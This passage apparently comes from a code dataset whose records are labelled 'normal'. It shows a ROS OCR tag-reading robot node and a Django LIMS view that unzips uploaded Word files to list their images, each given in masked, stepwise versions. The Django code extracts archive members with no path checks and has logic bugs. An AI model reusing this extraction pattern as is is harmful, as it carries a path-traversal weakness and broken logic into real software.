time.sleep(0.5)
return TagImageResponse()
if __name__=='__main__':
try:
rospy.init_node('readtag')
readtag = ReadTag()
rospy.spin()
except rospy.ROSInterruptException:
pass
|
normal
|
{
"blob_id": "83ce5ee4d2a18caeb364b74c3739015fc0e1474c",
"index": 1344,
"step-1": "#!/usr/bin/env python\n\nimport rospy\nimport numpy as np\nfrom sensor_msgs.msg import Image\nimport cv2, cv_bridge\nfrom geometry_msgs.msg import Twist, Pose2D\nfrom std_msgs.msg import String\nimport pytesseract as ocr\nfrom PIL import Image as imagePil\nimport os\nimport time\nfrom roseli.srv import CreateMap, CreateMapRequest\nfrom roseli.srv import TagImage, TagImageResponse\nfrom roseli.srv import ResetEnc, ResetEncRequest\nfrom dynamic_reconfigure.server import Server\nfrom roseli.cfg import ocr_tagConfig\n\nclass ReadTag:\n\n\tdef __init__(self):\n\t\tself.bridge = cv_bridge.CvBridge()\n\t\tself.twist=Twist()\n\t\tself.image_server = rospy.Service('/cropTag', TagImage, self.image_callback) #/cropTag\n\t\tself.cmd_vel_pub = rospy.Publisher('cmd_vel', Twist, queue_size=1)\n\t\tself.range_param = Server(ocr_tagConfig, self.reconfigure)\n\t\tself.string = String()\n\t\tself._pose2d_ = Pose2D()\n\t\tself.rate = rospy.Rate(1)\n\n\tdef reconfigure(self, config, level):\n\t\t#print(config)\n\t\tself.min_h = config.min_hue_ocr\n\t\tself.min_s = config.min_saturation_ocr\n\t\tself.min_v = config.min_value_ocr\n\t\tself.max_h = config.max_hue_ocr\n\t\tself.max_s = config.max_saturation_ocr\n\t\tself.max_v = config.max_value_ocr\n\t\treturn config\n\n\tdef creating_map_client(self, pose2d, ip):\n\n\t\trospy.wait_for_service('/pose2D')\n\n\t\ttry:\n\t\t\tcreate_map = rospy.ServiceProxy('/pose2D', CreateMap)\n\t\t\tresp = CreateMapRequest(pose2d, ip)\n\t\t\treturn create_map(resp)\n\t\texcept rospy.ServiceException, e:\n\t\t\tprint \"Service call failed: %s\"%e\n\n\tdef reset_enc_func(self):\n\n rospy.wait_for_service('/reset_enc_server')\n\n try:\n reset = rospy.ServiceProxy('/reset_enc_server', ResetEnc)\n resp = ResetEncRequest()\n return reset(resp)\n except rospy.ServiceException, e:\n print \"Service call failed: %s\"%e\n\n\tdef image_callback (self, msg):\n\t\tself.twist.linear.x = 0\n self.twist.angular.z = 0\n self.cmd_vel_pub.publish(self.twist)\n\t\tself.rate.sleep()\n\t\ttry:\n\t\t\timg = self.bridge.imgmsg_to_cv2(msg.tag, \"bgr8\")\n\t\texcept cv_bridge.CvBridgeError as e:\n\t\t\tprint (\"Error: Imagem da Tag nao recebida\")\n\t\t\tprint(e)\n\n\t\tlowerBound1=np.array([self.min_h, self.min_s, self.min_v]) #lower boundary of the HSV image\n\t\tupperBound1=np.array([self.max_h, self.max_s, self.max_v]) #Upper boundary of the HSV image\n\t\timg_HSV=cv2.cvtColor(img,cv2.COLOR_BGR2HSV)\n\t\timgThresholder=cv2.inRange(img_HSV,lowerBound1,upperBound1,1)\n\n\t\tcv2.imshow('picamera', img)\n\t\tcv2.waitKey(500)\n\t\tkernel = np.ones((3, 3), np.uint8)\n\t\timgFilter=cv2.morphologyEx(imgThresholder, cv2.MORPH_DILATE, kernel)\n\t\t#imgFilter=cv2.adaptiveThreshold(imgThresholder, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 11, 1)\n\t\tcv2.imshow('window_tag', imgFilter)\n\t\tcv2.waitKey(500)\n\t\t#cv2.destroyAllWindows()\n\t\t#cv2.waitKey(1000)\n\t\tfilename = \"{}.png\".format(os.getpid())\n\t\tcv2.imwrite(filename, imgFilter)\n\t\ttext = ocr.image_to_string(imagePil.open(filename),config=\"-c tessedit_char_whitelist=1234567890.\")\n\t\tos.remove(filename)\n\t\tprint(text)\n\t\tseparated= text.split(' ')\n\n\t\tif (not len(separated) == 3):\n\t\t\tprint(\"It doesn't read a tag!\")\n\t\t\treturn TagImageResponse()\n\t\telse:\n\t\t\tself._pose2d_.x = float(separated[0])\n\t\t\tself._pose2d_.y = float(separated[1])\n\t\t\tself._pose2d_.theta = float(separated[2])\n\n\t\t\t_resp_ = self.creating_map_client(self._pose2d_, 0)\n\t\t\tflag = 
self.reset_enc_func()\n\n\t\t\tself.twist.linear.x = 0.3\n\t\t\tself.twist.angular.z = 0\n\t\t\tfor x in range(0, 10):\n\t\t\t\tself.cmd_vel_pub.publish(self.twist)\n\t\t\t\ttime.sleep(0.5)\n\t\treturn TagImageResponse()\n\nif __name__=='__main__':\n\ttry:\n\t\trospy.init_node('readtag')\n\t\treadtag = ReadTag()\n\t\trospy.spin()\n\texcept rospy.ROSInterruptException:\n\t\tpass\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
import datetime
from django.shortcuts import render
from lims.models import *
import os
import zipfile
def getpicture(word):
if word.split(".")[1] not in ["doc","docx"]:
return None
word_zip = word.split(".")[0] + ".zip"
path = ""
for i in word.split("/")[0:-1]:
path += i
path += "/"
path += "tem/"
if not os.path.exists(path):
os.rename(word,word_zip)
f = zipfile.ZipFile(word_zip,"r")
for file in f.filelist:
f.extract(file,path)
f.close()
os.rename(word_zip,word)
pic = os.listdir(os.path.join(path,"word/media"))
result = []
result_ = []
for i in pic:
result.append(os.path.join(path,"word/media/") + i)
for j in result:
url = "/media/" + j.split("/media/")[1] + "/media/" + j.split("/media/")[2]
result_.append(url)
return result_
else:
pic = os.listdir(os.path.join(path, "word/media"))
result = []
result_ = []
for i in pic:
result.append(os.path.join(path, "word/media/") + i)
for j in result:
url = "/media/" + j.split("/media/")[1] + "/media/" +j.split("/media/")[2]
result_.append(url)
return result_
def getData(request):
index = request.GET.get("index")
msg = "未查找到数据"
if ExtExecute.objects.filter(query_code=index):
ext = ExtExecute.objects.filter(query_code=index).first()
result = getpicture(ext.upload_file.path)
if result:
for i in result:
i = request.META.get("HTTP_HOST") + i
subject = ext.extSubmit.subProject
dataset = ext.sampleinfoext_set.all()
type = 1
elif LibExecute.objects.filter(query_code=index):
result = getpicture(LibExecute.objects.filter(query_code=index).first().upload_file.path)
if result:
for i in result:
i = request.META.get("HTTP_HOST") + i
subject = LibExecute.objects.filter(query_code=index).first().libSubmit.subProject
dataset = LibExecute.objects.filter(query_code=index).first().sampleinfolib_set.all()
type = 2
elif SeqExecute.objects.filter(query_code=index):
subject = SeqExecute.objects.filter(query_code=index).first().seqSubmit.subProject
dataset = SeqExecute.objects.filter(query_code=index).first().sampleinfoseq_set.all()
type = 3
return render(request, "Showdata.html", {"data": dataset, "type": type, "subject": subject})
else:
return render(request,"Showdata.html",{"error":msg})
return render(request,"Showdata.html",{"data":dataset,"type":type,"subject":subject,"pic":result})
|
normal
|
{
"blob_id": "e32c73abdcd384ee7c369182527cca6495f067b3",
"index": 1977,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef getData(request):\n index = request.GET.get('index')\n msg = '未查找到数据'\n if ExtExecute.objects.filter(query_code=index):\n ext = ExtExecute.objects.filter(query_code=index).first()\n result = getpicture(ext.upload_file.path)\n if result:\n for i in result:\n i = request.META.get('HTTP_HOST') + i\n subject = ext.extSubmit.subProject\n dataset = ext.sampleinfoext_set.all()\n type = 1\n elif LibExecute.objects.filter(query_code=index):\n result = getpicture(LibExecute.objects.filter(query_code=index).\n first().upload_file.path)\n if result:\n for i in result:\n i = request.META.get('HTTP_HOST') + i\n subject = LibExecute.objects.filter(query_code=index).first(\n ).libSubmit.subProject\n dataset = LibExecute.objects.filter(query_code=index).first(\n ).sampleinfolib_set.all()\n type = 2\n elif SeqExecute.objects.filter(query_code=index):\n subject = SeqExecute.objects.filter(query_code=index).first(\n ).seqSubmit.subProject\n dataset = SeqExecute.objects.filter(query_code=index).first(\n ).sampleinfoseq_set.all()\n type = 3\n return render(request, 'Showdata.html', {'data': dataset, 'type':\n type, 'subject': subject})\n else:\n return render(request, 'Showdata.html', {'error': msg})\n return render(request, 'Showdata.html', {'data': dataset, 'type': type,\n 'subject': subject, 'pic': result})\n",
"step-3": "<mask token>\n\n\ndef getpicture(word):\n if word.split('.')[1] not in ['doc', 'docx']:\n return None\n word_zip = word.split('.')[0] + '.zip'\n path = ''\n for i in word.split('/')[0:-1]:\n path += i\n path += '/'\n path += 'tem/'\n if not os.path.exists(path):\n os.rename(word, word_zip)\n f = zipfile.ZipFile(word_zip, 'r')\n for file in f.filelist:\n f.extract(file, path)\n f.close()\n os.rename(word_zip, word)\n pic = os.listdir(os.path.join(path, 'word/media'))\n result = []\n result_ = []\n for i in pic:\n result.append(os.path.join(path, 'word/media/') + i)\n for j in result:\n url = '/media/' + j.split('/media/')[1] + '/media/' + j.split(\n '/media/')[2]\n result_.append(url)\n return result_\n else:\n pic = os.listdir(os.path.join(path, 'word/media'))\n result = []\n result_ = []\n for i in pic:\n result.append(os.path.join(path, 'word/media/') + i)\n for j in result:\n url = '/media/' + j.split('/media/')[1] + '/media/' + j.split(\n '/media/')[2]\n result_.append(url)\n return result_\n\n\ndef getData(request):\n index = request.GET.get('index')\n msg = '未查找到数据'\n if ExtExecute.objects.filter(query_code=index):\n ext = ExtExecute.objects.filter(query_code=index).first()\n result = getpicture(ext.upload_file.path)\n if result:\n for i in result:\n i = request.META.get('HTTP_HOST') + i\n subject = ext.extSubmit.subProject\n dataset = ext.sampleinfoext_set.all()\n type = 1\n elif LibExecute.objects.filter(query_code=index):\n result = getpicture(LibExecute.objects.filter(query_code=index).\n first().upload_file.path)\n if result:\n for i in result:\n i = request.META.get('HTTP_HOST') + i\n subject = LibExecute.objects.filter(query_code=index).first(\n ).libSubmit.subProject\n dataset = LibExecute.objects.filter(query_code=index).first(\n ).sampleinfolib_set.all()\n type = 2\n elif SeqExecute.objects.filter(query_code=index):\n subject = SeqExecute.objects.filter(query_code=index).first(\n ).seqSubmit.subProject\n dataset = SeqExecute.objects.filter(query_code=index).first(\n ).sampleinfoseq_set.all()\n type = 3\n return render(request, 'Showdata.html', {'data': dataset, 'type':\n type, 'subject': subject})\n else:\n return render(request, 'Showdata.html', {'error': msg})\n return render(request, 'Showdata.html', {'data': dataset, 'type': type,\n 'subject': subject, 'pic': result})\n",
"step-4": "import datetime\nfrom django.shortcuts import render\nfrom lims.models import *\nimport os\nimport zipfile\n\n\ndef getpicture(word):\n if word.split('.')[1] not in ['doc', 'docx']:\n return None\n word_zip = word.split('.')[0] + '.zip'\n path = ''\n for i in word.split('/')[0:-1]:\n path += i\n path += '/'\n path += 'tem/'\n if not os.path.exists(path):\n os.rename(word, word_zip)\n f = zipfile.ZipFile(word_zip, 'r')\n for file in f.filelist:\n f.extract(file, path)\n f.close()\n os.rename(word_zip, word)\n pic = os.listdir(os.path.join(path, 'word/media'))\n result = []\n result_ = []\n for i in pic:\n result.append(os.path.join(path, 'word/media/') + i)\n for j in result:\n url = '/media/' + j.split('/media/')[1] + '/media/' + j.split(\n '/media/')[2]\n result_.append(url)\n return result_\n else:\n pic = os.listdir(os.path.join(path, 'word/media'))\n result = []\n result_ = []\n for i in pic:\n result.append(os.path.join(path, 'word/media/') + i)\n for j in result:\n url = '/media/' + j.split('/media/')[1] + '/media/' + j.split(\n '/media/')[2]\n result_.append(url)\n return result_\n\n\ndef getData(request):\n index = request.GET.get('index')\n msg = '未查找到数据'\n if ExtExecute.objects.filter(query_code=index):\n ext = ExtExecute.objects.filter(query_code=index).first()\n result = getpicture(ext.upload_file.path)\n if result:\n for i in result:\n i = request.META.get('HTTP_HOST') + i\n subject = ext.extSubmit.subProject\n dataset = ext.sampleinfoext_set.all()\n type = 1\n elif LibExecute.objects.filter(query_code=index):\n result = getpicture(LibExecute.objects.filter(query_code=index).\n first().upload_file.path)\n if result:\n for i in result:\n i = request.META.get('HTTP_HOST') + i\n subject = LibExecute.objects.filter(query_code=index).first(\n ).libSubmit.subProject\n dataset = LibExecute.objects.filter(query_code=index).first(\n ).sampleinfolib_set.all()\n type = 2\n elif SeqExecute.objects.filter(query_code=index):\n subject = SeqExecute.objects.filter(query_code=index).first(\n ).seqSubmit.subProject\n dataset = SeqExecute.objects.filter(query_code=index).first(\n ).sampleinfoseq_set.all()\n type = 3\n return render(request, 'Showdata.html', {'data': dataset, 'type':\n type, 'subject': subject})\n else:\n return render(request, 'Showdata.html', {'error': msg})\n return render(request, 'Showdata.html', {'data': dataset, 'type': type,\n 'subject': subject, 'pic': result})\n",
"step-5": "import datetime\r\n\r\nfrom django.shortcuts import render\r\nfrom lims.models import *\r\nimport os\r\nimport zipfile\r\n\r\ndef getpicture(word):\r\n if word.split(\".\")[1] not in [\"doc\",\"docx\"]:\r\n return None\r\n word_zip = word.split(\".\")[0] + \".zip\"\r\n path = \"\"\r\n for i in word.split(\"/\")[0:-1]:\r\n path += i\r\n path += \"/\"\r\n path += \"tem/\"\r\n if not os.path.exists(path):\r\n os.rename(word,word_zip)\r\n f = zipfile.ZipFile(word_zip,\"r\")\r\n for file in f.filelist:\r\n f.extract(file,path)\r\n f.close()\r\n os.rename(word_zip,word)\r\n pic = os.listdir(os.path.join(path,\"word/media\"))\r\n result = []\r\n result_ = []\r\n for i in pic:\r\n result.append(os.path.join(path,\"word/media/\") + i)\r\n for j in result:\r\n url = \"/media/\" + j.split(\"/media/\")[1] + \"/media/\" + j.split(\"/media/\")[2]\r\n result_.append(url)\r\n return result_\r\n else:\r\n pic = os.listdir(os.path.join(path, \"word/media\"))\r\n result = []\r\n result_ = []\r\n for i in pic:\r\n result.append(os.path.join(path, \"word/media/\") + i)\r\n for j in result:\r\n url = \"/media/\" + j.split(\"/media/\")[1] + \"/media/\" +j.split(\"/media/\")[2]\r\n result_.append(url)\r\n return result_\r\n\r\n\r\ndef getData(request):\r\n index = request.GET.get(\"index\")\r\n msg = \"未查找到数据\"\r\n if ExtExecute.objects.filter(query_code=index):\r\n ext = ExtExecute.objects.filter(query_code=index).first()\r\n result = getpicture(ext.upload_file.path)\r\n if result:\r\n for i in result:\r\n i = request.META.get(\"HTTP_HOST\") + i\r\n subject = ext.extSubmit.subProject\r\n dataset = ext.sampleinfoext_set.all()\r\n type = 1\r\n elif LibExecute.objects.filter(query_code=index):\r\n result = getpicture(LibExecute.objects.filter(query_code=index).first().upload_file.path)\r\n if result:\r\n for i in result:\r\n i = request.META.get(\"HTTP_HOST\") + i\r\n subject = LibExecute.objects.filter(query_code=index).first().libSubmit.subProject\r\n dataset = LibExecute.objects.filter(query_code=index).first().sampleinfolib_set.all()\r\n type = 2\r\n elif SeqExecute.objects.filter(query_code=index):\r\n subject = SeqExecute.objects.filter(query_code=index).first().seqSubmit.subProject\r\n dataset = SeqExecute.objects.filter(query_code=index).first().sampleinfoseq_set.all()\r\n type = 3\r\n return render(request, \"Showdata.html\", {\"data\": dataset, \"type\": type, \"subject\": subject})\r\n else:\r\n return render(request,\"Showdata.html\",{\"error\":msg})\r\n return render(request,\"Showdata.html\",{\"data\":dataset,\"type\":type,\"subject\":subject,\"pic\":result})",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |